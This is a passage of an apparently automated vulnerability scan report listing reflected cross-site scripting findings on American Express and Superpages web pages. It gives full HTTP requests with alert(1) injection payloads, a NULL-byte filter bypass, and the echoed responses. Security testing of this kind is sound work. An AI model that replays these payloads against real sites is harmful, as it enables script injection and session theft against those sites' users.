Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:24 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b";
   </script>
...[SNIP]...

4.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742109623898; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000kt9fEePAKN3zFZ84FN4F_Dj:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:29 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1";
   </script>
...[SNIP]...

4.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89";
   </script>
...[SNIP]...

4.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742121204958; path=/; expires=Sun, 07-Feb-16 14:08:41 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000zXlT7tO4dPEpQjTetmu9Wlt:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:41 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "8efe8";alert(1)//d1240e2685e=1";
   </script>
...[SNIP]...

4.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:36 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742116979490; path=/; expires=Sun, 07-Feb-16 14:08:36 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000HiS-OjEOSZC4JaXS7Qm_PPe:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:36 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?.d7597"><script>alert(1)</script>c7d4c5b0106=1" />
...[SNIP]...

4.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:38 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742118555633; path=/; expires=Sun, 07-Feb-16 14:08:38 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000BLrKMWo6FW5mWWeCqsNkbyV:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:38 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "source=footer_small_business_credit_cards3cde0";alert(1)//2536ed24016";
   </script>
...[SNIP]...

4.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:32 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742112375272; path=/; expires=Sun, 07-Feb-16 14:08:32 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000ZIXNv3hxn7zFYSx2jAzWxLF:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:32 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?source=footer_small_business_credit_cards.d8dc2"><script>alert(1)</script>6a405ec230b" />
...[SNIP]...

4.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /getthecard/home

Issue detail

The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:19 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="htt
...[SNIP]...
<script type="text/javascript">
var sj_responseText="";
var sj_rsvpStatus="";
var sj_offerURL="";
var sj_rsvpAttempts= 0;
var sj_pageContext="Prospect";
var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb;
var sj_modalToOpen = "null";
var sj_servername = "www201.americanexpress.com";
</script>
...[SNIP]...

4.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile87daf&quot;-alert(1)-&quot;1a7bb763e07/css/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=B99972F11C8DCBE31C71CEA0725DF8FE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:56 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css6d043&quot;-alert(1)-&quot;ea78a66d4f3/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=D39CC0F55EE6FF1DCB0F7AE681BEEEFC; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/busprofile.css14dd6&quot;-alert(1)-&quot;584c21ff5a6
Server: Unspecified
Set-Cookie: JSESSIONID=A0B8DA0925D4013D343773E12EB6B2B9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile46554&quot;-alert(1)-&quot;be25698ff9/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C43C42A2F651864B58C61C05BB832B63; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:58 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile46554"-alert(1)-"be25698ff9/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/cssb6866&quot;-alert(1)-&quot;0f304c70d9e/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C18D83DEE8E4FAD1642CFA1B00191576; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:06 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/print.cssff3b0&quot;-alert(1)-&quot;0f9464b5bb7
Server: Unspecified
Set-Cookie: JSESSIONID=EB0CD557543B7B79EFDB0A2D65AFDA04; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:14 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile49cd4&quot;-alert(1)-&quot;96eceb6ffe4/js/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=E1DEBECF6D55BEE5047D715F190E5E85; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:11 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
